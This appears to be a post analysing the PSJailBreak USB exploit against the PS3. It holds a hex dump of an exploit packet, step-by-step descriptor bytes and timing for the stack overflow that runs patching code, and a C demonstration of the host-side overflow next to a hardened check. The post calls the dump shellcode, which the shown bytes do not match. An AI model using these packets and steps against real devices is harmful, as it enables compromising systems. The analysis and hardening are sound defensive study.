FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00 FE 01 02 00 09 04 00 00 00 FE 01 02

So what does this mean? Disane summarized it below:

This is the PowerPC code, the shellcode, that gets injected. The best approach would be to use LV2 in order to understand how the dongle performs its stack overflow exploit on the PS3's USB buffer. After that, it will be reproducible on any firmware and on every PS3 model.

The JIG ID is surely programmed to trigger code that overflows the configuration descriptor and injects the shellcode once that code is executed. The shellcode patches LV2 to launch FSELFs and other things I have not noticed yet…

Here is a possible way the PSJailBreak works:

* The PSJailBreak is plugged in.

* It connects to the host (PS3) and sends 09 02 12 00 01 00 00 80 together with all the bytes of the first packet, from offset 0x0008 to 0x0EFF.

* The stack overflows and the PS3 executes the code contained in the packet.

* The ATMega issues a USB disconnect.

* These last three steps are repeated three times.

* It connects to the host and sends 09 02 4D 0A 01 01 00 80 plus the bytes of the second packet, from offset 0x0008 to 0x0A4C.

* The stack overflows and the PS3 executes the code contained in the packet.

* The ATMega issues a USB disconnect.

* These last three steps are repeated two times.
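The sequence above hinges on one host-side mistake: the host reads the 8-byte configuration descriptor header first, sizes its buffer from wTotalLength, then asks for the whole descriptor again and accepts whatever the device returns. The following is an added example, written for this page (it is neither the original post's code nor the PS3's or the dongle's): a C check over both packets from the dumps. The first packet is rebuilt from its first 32 bytes as printed above with the rest zero-filled (a constructed sample; the real dump carries the PowerPC payload there); the second is regenerated from its 9-byte header plus the repeated interface descriptor, which is all that dump contains. `host_receive` is an illustrative model of the naive second copy beside the clamped one, not a reconstruction of the PS3's USB stack.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

#define USB_DT_CONFIG    0x02
#define USB_DT_INTERFACE 0x04
#define PKT1_LEN 0xF00   /* bytes the first dump actually carries */
#define PKT2_LEN 0xA4D   /* wTotalLength of the second dump */

/* First 32 bytes of the first dump, verbatim: config header, one interface
   descriptor (class 0xFE), padding, then the FA CE B0 03 AA BB CC DD marker.
   The rest is zero-filled here (constructed; the real dump holds the payload). */
static const uint8_t pkt1_head[32] = {
    0x09,0x02,0x12,0x00,0x01,0x00,0x00,0x80, 0xFA,0x09,0x04,0x00,0x00,0x00,0xFE,0x01,
    0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0xFA,0xCE,0xB0,0x03,0xAA,0xBB,0xCC,0xDD
};
/* Second dump: 9-byte config header, then one 9-byte interface descriptor
   repeated until wTotalLength is filled (0xA4D - 9 = 292 * 9). */
static const uint8_t pkt2_hdr[9]   = {0x09,0x02,0x4D,0x0A,0x01,0x01,0x00,0x80,0x01};
static const uint8_t pkt2_iface[9] = {0x09,0x04,0x00,0x00,0x00,0xFE,0x01,0x02,0x00};

size_t build_pkt(int which, uint8_t *out, size_t cap)
{
    if (which == 1) {
        if (cap < PKT1_LEN) return 0;
        memset(out, 0, PKT1_LEN);
        memcpy(out, pkt1_head, sizeof pkt1_head);
        return PKT1_LEN;
    }
    if (cap < PKT2_LEN) return 0;
    memcpy(out, pkt2_hdr, sizeof pkt2_hdr);
    for (size_t off = sizeof pkt2_hdr; off < PKT2_LEN; off += sizeof pkt2_iface)
        memcpy(out + off, pkt2_iface, sizeof pkt2_iface);
    return PKT2_LEN;
}

struct cfg_report {
    uint16_t claimed_total;    /* wTotalLength from the header */
    size_t   received;         /* bytes the device actually delivered */
    unsigned declared_ifaces;  /* bNumInterfaces */
    unsigned found_ifaces;     /* interface descriptors actually present */
    int      overflow;         /* received > claimed_total */
    int      malformed;        /* bad header, or a sub-descriptor did not fit */
};

/* Walk a configuration descriptor the way a host stack must: trust nothing
   past wTotalLength, and every sub-descriptor must fit its own bLength.
   Returns 0 when clean, 1 when inconsistent, -1 on a bad header. */
int usb_check_config(const uint8_t *buf, size_t len, struct cfg_report *r)
{
    memset(r, 0, sizeof *r);
    if (len < 9 || buf[0] != 9 || buf[1] != USB_DT_CONFIG) { r->malformed = 1; return -1; }
    r->claimed_total   = (uint16_t)(buf[2] | (buf[3] << 8));   /* little-endian */
    r->declared_ifaces = buf[4];
    r->received        = len;
    r->overflow        = len > r->claimed_total;
    size_t limit = len < r->claimed_total ? len : r->claimed_total;
    for (size_t off = 9; off < limit; ) {
        uint8_t bl = buf[off];
        if (bl < 2 || off + bl > limit) { r->malformed = 1; break; }
        if (buf[off + 1] == USB_DT_INTERFACE) r->found_ifaces++;
        off += bl;
    }
    return (r->overflow || r->malformed || r->found_ifaces != r->declared_ifaces) ? 1 : 0;
}

/* Host side of the second GET_DESCRIPTOR(CONFIGURATION): `alloc` was sized
   from wTotalLength in the 8-byte first read. Returns how many bytes would
   land past that allocation; the hardened variant clamps the copy to it.
   (Illustrative model of the flaw, not the PS3's code.) */
size_t host_receive(const uint8_t *dev, size_t dev_len, size_t alloc, int hardened)
{
    uint8_t *buf = calloc(alloc + dev_len, 1);   /* slack so this demo itself cannot crash */
    if (!buf) return 0;
    size_t n = (hardened && dev_len > alloc) ? alloc : dev_len;
    memcpy(buf, dev, n);
    free(buf);
    return n > alloc ? n - alloc : 0;
}

/* Scalar-returning helpers over the two captured packets. */
struct cfg_report report_pkt(int which)
{
    static uint8_t buf[PKT1_LEN];                /* PKT1_LEN >= PKT2_LEN */
    struct cfg_report r;
    size_t len = build_pkt(which, buf, sizeof buf);
    usb_check_config(buf, len, &r);
    return r;
}

size_t spill_pkt1(int hardened)
{
    static uint8_t buf[PKT1_LEN];
    size_t len = build_pkt(1, buf, sizeof buf);
    size_t alloc = buf[2] | (buf[3] << 8);       /* 0x12: what the first read promised */
    return host_receive(buf, len, alloc, hardened);
}

int main(void)
{
    for (int w = 1; w <= 2; w++) {
        struct cfg_report r = report_pkt(w);
        printf("packet %d: wTotalLength=0x%04X received=0x%zX interfaces=%u/%u overflow=%d malformed=%d\n",
               w, r.claimed_total, r.received, r.found_ifaces, r.declared_ifaces, r.overflow, r.malformed);
    }
    printf("packet 1 bytes past the allocation: naive=%zu hardened=%zu\n", spill_pkt1(0), spill_pkt1(1));
    return 0;
}
```

Run as is, the check reports packet 1 as claiming 0x12 bytes yet delivering 0xF00, which puts 0xEEE bytes past the allocation under the naive copy and none under the clamped one, and packet 2 as length-consistent but declaring one interface while carrying 292 interface descriptors of class 0xFE. The two host-side rules that follow are the ones worth checking in any USB stack: the second descriptor request must be bounded by the allocation made from the first, and sub-descriptor walking must stop at wTotalLength and reconcile what it finds with bNumInterfaces.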

As well as the two hex dumps converted to ASCII:

First part

Second part

In full